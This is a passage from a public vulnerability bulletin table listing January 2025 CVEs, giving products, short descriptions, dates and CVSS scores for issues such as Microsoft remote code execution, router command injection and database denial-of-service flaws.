Microsoft SharePoint Server Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21344 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 |
Microsoft SharePoint Server Remote Code Execution Vulnerability | 2025-01-14 | 7.2 | CVE-2025-21348 |
| Microsoft--Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) |
.NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21176 |
| Microsoft--Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) |
Visual Studio Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21178 |
| Microsoft--Microsoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) |
.NET and Visual Studio Remote Code Execution Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21172 |
| Microsoft--Office Online Server |
Microsoft Excel Remote Code Execution Vulnerability | 2025-01-14 | 8.4 | CVE-2025-21354 |
| Microsoft--Power Automate for Desktop |
Microsoft Power Automate Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21187 |
| Microsoft--Windows 10 Version 1809 |
Windows OLE Remote Code Execution Vulnerability | 2025-01-14 | 9.8 | CVE-2025-21298 |
| Microsoft--Windows 10 Version 1809 |
Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability | 2025-01-14 | 9.8 | CVE-2025-21307 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21223 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21233 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21236 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21237 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21238 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21239 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21240 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21241 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21243 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21244 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21245 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21246 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21248 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21250 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21252 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21266 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21273 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21282 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21286 |
| Microsoft--Windows 10 Version 1809 |
Windows Direct Show Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21291 |
| Microsoft--Windows 10 Version 1809 |
Windows Search Service Elevation of Privilege Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21292 |
| Microsoft--Windows 10 Version 1809 |
Active Directory Domain Services Elevation of Privilege Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21293 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Digest Authentication Remote Code Execution Vulnerability | 2025-01-14 | 8.1 | CVE-2025-21294 |
| Microsoft--Windows 10 Version 1809 |
SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability | 2025-01-14 | 8.1 | CVE-2025-21295 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21302 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21303 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21305 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21306 |
| Microsoft--Windows 10 Version 1809 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21339 |
| Microsoft--Windows 10 Version 1809 |
Windows Connected Devices Platform Service (Cdpsvc) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21207 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing Information Disclosure Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21220 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21230 |
| Microsoft--Windows 10 Version 1809 |
IP Helper Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21231 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21251 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21270 |
| Microsoft--Windows 10 Version 1809 |
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21271 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21277 |
| Microsoft--Windows 10 Version 1809 |
Microsoft COM for Windows Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21281 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21285 |
| Microsoft--Windows 10 Version 1809 |
Windows Installer Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21287 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21289 |
| Microsoft--Windows 10 Version 1809 |
Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21290 |
| Microsoft--Windows 10 Version 1809 |
BranchCache Remote Code Execution Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21296 |
| Microsoft--Windows 10 Version 1809 |
Windows Kerberos Security Feature Bypass Vulnerability | 2025-01-14 | 7.1 | CVE-2025-21299 |
| Microsoft--Windows 10 Version 1809 |
Windows upnphost.dll Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21300 |
| Microsoft--Windows 10 Version 1809 |
Microsoft DWM Core Library Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21304 |
| Microsoft--Windows 10 Version 1809 |
Windows Remote Desktop Services Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21330 |
| Microsoft--Windows 10 Version 1809 |
Windows Installer Elevation of Privilege Vulnerability | 2025-01-14 | 7.3 | CVE-2025-21331 |
| Microsoft--Windows 10 Version 1809 |
GDI+ Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21338 |
| Microsoft--Windows 10 Version 21H2 |
Windows Secure Kernel Mode Elevation of Privilege Vulnerability | 2025-01-17 | 7.8 | CVE-2025-21325 |
| Microsoft--Windows 11 version 22H2 |
Windows Web Threat Defense User Service Information Disclosure Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21343 |
| Microsoft--Windows Server 2019 |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2025-01-14 | 8.1 | CVE-2025-21297 |
| Microsoft--Windows Server 2019 |
Windows Remote Desktop Services Remote Code Execution Vulnerability | 2025-01-14 | 8.1 | CVE-2025-21309 |
| Microsoft--Windows Server 2019 |
Windows Kerberos Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21218 |
| Microsoft--Windows Server 2022 |
Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability | 2025-01-14 | 8.1 | CVE-2025-21224 |
| Microsoft--Windows Server 2022 |
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21234 |
| Microsoft--Windows Server 2022 |
Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21235 |
| Microsoft--Windows Server 2022 |
Windows App Package Installer Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21275 |
| Microsoft--Windows Server 2025 (Server Core installation) |
Windows NTLM V1 Elevation of Privilege Vulnerability | 2025-01-14 | 9.8 | CVE-2025-21311 |
| Microsoft--Windows Server 2025 (Server Core installation) |
Windows MapUrlToZone Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21276 |
| Microsoft--Windows Server 2025 (Server Core installation) |
Microsoft Brokering File System Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21315 |
| Microsoft--Windows Server 2025 |
Internet Explorer Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21326 |
| Mighty Digital--Partners |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mighty Digital Partners allows Reflected XSS.This issue affects Partners: from n/a through 0.2.0. | 2025-01-15 | 7.1 | CVE-2025-22751 |
| Mike Selander--WP Options Editor |
Cross-Site Request Forgery (CSRF) vulnerability in Mike Selander WP Options Editor allows Privilege Escalation.This issue affects WP Options Editor: from n/a through 1.1. | 2025-01-16 | 9.8 | CVE-2025-23797 |
| Milo eki--Inline Tweets |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MiloÅ¡ Äekić Inline Tweets allows Stored XSS.This issue affects Inline Tweets: from n/a through 2.0. | 2025-01-13 | 7.1 | CVE-2025-22570 |
| mongoosejs--Mongoose |
Mongoose before 8.9.5 can improperly use a nested $where filter with a populate() match, leading to search injection. NOTE: this issue exists because of an incomplete fix for CVE-2024-53900. | 2025-01-15 | 9 | CVE-2025-23061 |
| Mozilla--Web Push |
Cross-Site Request Forgery (CSRF) vulnerability in Mozilla Web Push allows Stored XSS.This issue affects Web Push: from n/a through 1.4.0. | 2025-01-16 | 7.1 | CVE-2025-23720 |
| Mukesh Dak--MD Custom content after or before of post |
Cross-Site Request Forgery (CSRF) vulnerability in Mukesh Dak MD Custom content after or before of post allows Stored XSS.This issue affects MD Custom content after or before of post: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23463 |
| Myriad Solutionz--Stars SMTP Mailer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Myriad Solutionz Stars SMTP Mailer allows Reflected XSS.This issue affects Stars SMTP Mailer: from n/a through 1.7. | 2025-01-16 | 7.1 | CVE-2025-23453 |
| n/a--AquilaCMS |
A vulnerability was found in AquilaCMS 1.412.13. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/v2/categories. The manipulation of the argument PostBody.populate leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-14 | 7.3 | CVE-2025-0465 |
| n/a--Blog Botz for Journal Theme |
A vulnerability, which was classified as critical, was found in Blog Botz for Journal Theme 1.0 on OpenCart. This affects an unknown part of the file /index.php?route=extension/module/blog_add. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-14 | 7.3 | CVE-2025-0460 |
| n/a--n/a |
Incorrect Access Control in Cfx.re FXServer v9601 and earlier allows unauthenticated users to modify and read arbitrary user data via exposed API endpoint | 2025-01-13 | 9.1 | CVE-2024-46310 |
| n/a--n/a |
HI-SCAN 6040i Hitrax HX-03-19-I was discovered to contain hardcoded credentials for access to vendor support and service access. | 2025-01-15 | 9.8 | CVE-2024-48126 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "minute" parameters in setScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57011 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "week" parameter in setScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57012 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "switch" parameter in setScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57013 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "recHour" parameter in setScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57014 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "hour" parameter in setScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57015 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "user" parameter in setVpnAccountCfg. | 2025-01-15 | 9.8 | CVE-2024-57016 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "pass" parameter in setVpnAccountCfg. | 2025-01-15 | 9.8 | CVE-2024-57017 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "desc" parameter in setVpnAccountCfg. | 2025-01-15 | 9.8 | CVE-2024-57018 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "limit" parameter in setVpnAccountCfg. | 2025-01-15 | 9.8 | CVE-2024-57019 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "sMinute" parameter in setWiFiScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57020 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "eHour" parameter in setWiFiScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57021 |
| n/a--n/a |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an OS command injection vulnerability via the "sHour" parameter in setWiFiScheduleCfg. | 2025-01-15 | 9.8 | CVE-2024-57022 |
| n/a--n/a |
H3C N12 V100R005 contains a buffer overflow vulnerability due to the lack of length verification in the mac address editing function. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a POST request to /bin/webs. | 2025-01-14 | 9.8 | CVE-2024-57473 |
| n/a--n/a |
H3C N12 V100R005 contains a buffer overflow vulnerability due to the lack of length verification in the mac address update function. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a POST request to /bin/webs. | 2025-01-14 | 9.8 | CVE-2024-57479 |
| n/a--n/a |
H3C N12 V100R005 contains a buffer overflow vulnerability due to the lack of length verification in the AP configuration function. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a POST request to /bin/webs. | 2025-01-14 | 9.8 | CVE-2024-57480 |
| n/a--n/a |
Tenda i24 V2.0.0.5 is vulnerable to Buffer Overflow in the addWifiMacFilter function. | 2025-01-14 | 9.8 | CVE-2024-57483 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the limitSpeedUp parameter in the formSetClientState function. | 2025-01-16 | 9.8 | CVE-2024-57579 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the devName parameter in the formSetDeviceName function. | 2025-01-16 | 9.8 | CVE-2024-57580 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the firewallEn parameter in the formSetFirewallCfg function. | 2025-01-16 | 9.8 | CVE-2024-57581 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the startIP parameter in the formSetPPTPServer function. | 2025-01-16 | 9.8 | CVE-2024-57582 |
| n/a--n/a |
An access control issue in the component formDMZ.cgi of D-Link 816A2_FWv1.10CNB05_R1B011D88210 allows unauthenticated attackers to set the DMZ service of the device via a crafted POST request. | 2025-01-16 | 9.8 | CVE-2024-57684 |
| n/a--n/a |
JFinalOA before v2025.01.01 was discovered to contain a SQL injection vulnerability via the component validRoleKey?sysRole.key. | 2025-01-16 | 9.8 | CVE-2024-57768 |
| n/a--n/a |
In Eaton X303 3.5.16 - X303 3.5.17 Build 712, an attacker with network access to a XC-303 PLC can login as root over SSH. The root password is hardcoded in the firmware. NOTE: This vulnerability appears in versions that are no longer supported by Eaton. | 2025-01-13 | 9.1 | CVE-2024-57811 |
| n/a--n/a |
RE11S v1.11 was discovered to contain a stack overflow via the pptpUserName parameter in the setWAN function. | 2025-01-16 | 9.8 | CVE-2025-22904 |
| n/a--n/a |
RE11S v1.11 was discovered to contain a command injection vulnerability via the command parameter at /goform/mp. | 2025-01-16 | 9.8 | CVE-2025-22905 |
| n/a--n/a |
RE11S v1.11 was discovered to contain a command injection vulnerability via the L2TPUserName parameter at /goform/setWAN. | 2025-01-16 | 9.8 | CVE-2025-22906 |
| n/a--n/a |
RE11S v1.11 was discovered to contain a stack overflow via the selSSID parameter in the formWlSiteSurvey function. | 2025-01-16 | 9.8 | CVE-2025-22907 |
| n/a--n/a |
RE11S v1.11 was discovered to contain a command injection vulnerability via the component /goform/formAccept. | 2025-01-16 | 9.8 | CVE-2025-22912 |
| n/a--n/a |
RE11S v1.11 was discovered to contain a stack overflow via the rootAPmac parameter in the formStaDrvSetup function. | 2025-01-16 | 9.8 | CVE-2025-22913 |
| n/a--n/a |
RE11S v1.11 was discovered to contain a stack overflow via the pppUserName parameter in the formPPPoESetup function. | 2025-01-16 | 9.8 | CVE-2025-22916 |
| n/a--n/a |
An issue in D-Link DWR-M972V 1.05SSG allows a remote attacker to execute arbitrary code via SSH using root account without restrictions | 2025-01-15 | 9.8 | CVE-2025-22968 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in multiple POST parameters of /vam/vam_visits.php. | 2025-01-13 | 8.8 | CVE-2023-42244 |
| n/a--n/a |
Multiple endpoints in GestioIP v3.5.7 are vulnerable to Cross-Site Request Forgery (CSRF). An attacker can execute actions via the admin's browser by hosting a malicious URL, leading to data modification, deletion, or exfiltration. | 2025-01-14 | 8.8 | CVE-2024-50858 |
| n/a--n/a |
Wegia < 3.2.0 is vulnerable to Cross Site Scripting (XSS) in /geral/documentos_funcionario.php via the id parameter. | 2025-01-17 | 8.1 | CVE-2024-57030 |
| n/a--n/a |
An issue in the AsDB service of HI-SCAN 6040i Hitrax HX-03-19-I allows attackers to enumerate user credentials via crafted GIOP protocol requests. | 2025-01-15 | 7.5 | CVE-2024-48125 |
| n/a--n/a |
A Broken Object Level Authorization (BOLA) vulnerability in Indico v3.2.9 allows attackers to access sensitive information via sending a crafted POST request to the component /api/principals. | 2025-01-16 | 7.5 | CVE-2024-50633 |
| n/a--n/a |
An issue in XINJE XL5E-16T V3.7.2a allows attackers to cause a Denial of Service (DoS) via a crafted Modbus message. | 2025-01-15 | 7.5 | CVE-2024-50953 |
| n/a--n/a |
The XINJE XL5E-16T and XD5E-24R-E programmable logic controllers V3.5.3b-V3.7.2a have a vulnerability in handling Modbus messages. When a TCP connection is established with the above series of controllers within a local area network (LAN), sending a specific Modbus message to the controller can cause the PLC to crash, interrupting the normal operation of the programs running in the PLC. This results in the ERR indicator light turning on and the RUN indicator light turning off. | 2025-01-15 | 7.5 | CVE-2024-50954 |
| n/a--n/a |
Teradata Vantage Editor 1.0.1 is mostly intended for SQL database access and docs.teradata.com access, but provides unintended functionality (including Chromium Developer Tools) that can result in a client user accessing arbitrary remote websites. | 2025-01-17 | 7.1 | CVE-2024-52870 |
| n/a--n/a |
Flatnotes <v5.3.1 is vulnerable to denial of service through the upload image function. | 2025-01-14 | 7.5 | CVE-2024-54730 |
| n/a--n/a |
Campcodes Cybercafe Management System v1.0 is vulnerable to SQL Injection in /ccms/view-user-detail.php. | 2025-01-16 | 7.2 | CVE-2024-57162 |
| n/a--n/a |
An issue in the BATcalcbetween_intern component of MonetDB Server v11.47.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57615 |
| n/a--n/a |
An issue in the vscanf component of MonetDB Server v11.47.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57616 |
| n/a--n/a |
An issue in the dameraulevenshtein component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57617 |
| n/a--n/a |
An issue in the bind_col_exp component of MonetDB Server v11.47.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57618 |
| n/a--n/a |
An issue in the atom_get_int component of MonetDB Server v11.47.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57619 |
| n/a--n/a |
An issue in the trimchars component of MonetDB Server v11.47.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57620 |
| n/a--n/a |
An issue in the GDKanalytical_correlation component of MonetDB Server v11.47.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57621 |
| n/a--n/a |
An issue in the exp_bin component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57622 |
| n/a--n/a |
An issue in the HEAP_malloc component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57623 |
| n/a--n/a |
An issue in the exp_atom component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57624 |
| n/a--n/a |
An issue in the merge_table_prune_and_unionize component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57625 |
| n/a--n/a |
An issue in the mat_join2 component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57626 |
| n/a--n/a |
An issue in the gc_col component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57627 |
| n/a--n/a |
An issue in the exp_values_set_supertype component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57628 |
| n/a--n/a |
An issue in the tail_type component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57629 |
| n/a--n/a |
An issue in the exps_card component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57630 |
| n/a--n/a |
An issue in the exp_ref component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57631 |
| n/a--n/a |
An issue in the is_column_unique component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57632 |
| n/a--n/a |
An issue in the exps_bind_column component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57633 |
| n/a--n/a |
An issue in the exp_copy component of MonetDB Server v11.49.1 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57634 |
| n/a--n/a |
An issue in the chash_array component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57635 |
| n/a--n/a |
An issue in the itc_sample_row_check component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57636 |
| n/a--n/a |
An issue in the dfe_unit_gb_dependant component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57637 |
| n/a--n/a |
An issue in the dfe_body_copy component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57638 |
| n/a--n/a |
An issue in the dc_elt_size component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57639 |
| n/a--n/a |
An issue in the dc_add_int component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57640 |
| n/a--n/a |
An issue in the sqlexp component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57641 |
| n/a--n/a |
An issue in the dfe_inx_op_col_def_table component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57642 |
| n/a--n/a |
An issue in the box_deserialize_string component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57643 |
| n/a--n/a |
An issue in the itc_hash_compare component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57644 |
| n/a--n/a |
An issue in the qi_inst_state_free component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57645 |
| n/a--n/a |
An issue in the psiginfo component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57646 |
| n/a--n/a |
An issue in the row_insert_cast component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57647 |
| n/a--n/a |
An issue in the itc_set_param_row component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57648 |
| n/a--n/a |
An issue in the qst_vec_set component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57649 |
| n/a--n/a |
An issue in the qi_inst_state_free component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57650 |
| n/a--n/a |
An issue in the jp_add component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57651 |
| n/a--n/a |
An issue in the numeric_to_dv component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57652 |
| n/a--n/a |
An issue in the qst_vec_get_int64 component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57654 |
| n/a--n/a |
An issue in the dfe_n_in_order component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57655 |
| n/a--n/a |
An issue in the sqlc_add_distinct_node component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57656 |
| n/a--n/a |
